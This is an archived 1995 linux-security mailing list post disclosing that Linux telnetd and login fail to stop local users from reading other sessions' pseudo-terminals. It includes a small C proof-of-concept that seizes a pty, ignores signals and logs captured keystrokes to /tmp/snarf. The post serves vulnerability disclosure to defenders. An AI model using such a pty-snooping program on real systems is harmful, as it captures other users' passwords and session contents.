[376] in linux-security and linux-alert archive
Listening on /dev/ttyp*
daemon@ATHENA.MIT.EDU (Olaf Kirch)
Wed Sep 20 16:15:28 1995
From: okir@monad.swb.de (Olaf Kirch)
To: linux-security@tarsier.cv.nrao.edu
Date: Wed, 20 Sep 1995 21:34:38 +0200 (MET DST)
-----BEGIN PGP SIGNED MESSAGE-----
Hi all,
I've done some more testing on this, and got the following results
with 1.2.10 (yeah, I'm not really on the bleeding edge):
* telnetd as of NetKit-0.5 does not protect you from anyone
snooping on your pty. I guess we know that by now.
There's some code in sys_term.c that does a vhangup on the
pty, but it's commented out for Linux. The comment says that
this appears to be buggy
* Using login from util-linux-2.2 helps a bit. If you do a
cat /dev/ttyp0, it will terminate once login is executed by
telnetd. That's because login *does* do a vhangup.
* Unfortunately, this is not the end of it. I experimented
a little, and found that a program that ignores all signals
*and* makes the pty its controlling tty will happily live on,
and is still able to read data from it. I'm including it
below.
What I do not understand is why this does not make telnetd
fail when doing an ioctl(TIOCSCTTY). Anyone more familiar with
this stuff may be able to shed some light on this (Ted?).
Olaf
- --
Olaf Kirch | --- o --- Nous sommes du soleil we love when we play
okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax
For my PGP public key, finger okir@brewhq.swb.de.
- ------------------------------------------------------------------
/*
* simple test program for. Not my usual standard of coding...
*/
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <termios.h>
#include <sys/types.h>
#include <sys/fcntl.h>
int
main(int argc, char **argv)
{
char buffer[256];
FILE *fp;
int fd, i, n;
for (i = 0; i < 256; i++)
close(i);
setsid();
if ((fd = open(argv[1], O_RDWR)) < 0) {
perror("open");
return 2;
}
if (ioctl(fd, TIOCSCTTY, NULL) < 0)
perror("ioctl");
if ((fp = fopen("/tmp/snarf", "w")) == NULL)
return 2;
for (i = 0; i < 32; i++)
signal(i, SIG_IGN);
while ((n = read(fd, buffer, 255)) > 0) {
buffer[n] = 0;
fprintf(fp, "got %s\n", buffer);
}
perror("read");
return 2;
}
-----BEGIN PGP SIGNATURE-----
Version: 2.6
iQCVAgUBMGBsa+FnVHXv40etAQHL7QQAgCrvfxjzQlCpNGv+ZNXLM1pF9U6G8JGJ
yM89BO+uTBjh9SmFr/yX93l4zveoxqYXnQRc30+JQGBI6Q96fwtPrTyNVU2+UodS
K+uCmr9p2Hu5mpLGD4RFFK/P6KANNXR2DR7fmBaytD/GgkuiixNbaQ6/j+a6kgmc
u6xcgUx8K3g=
=ztbx
-----END PGP SIGNATURE-----
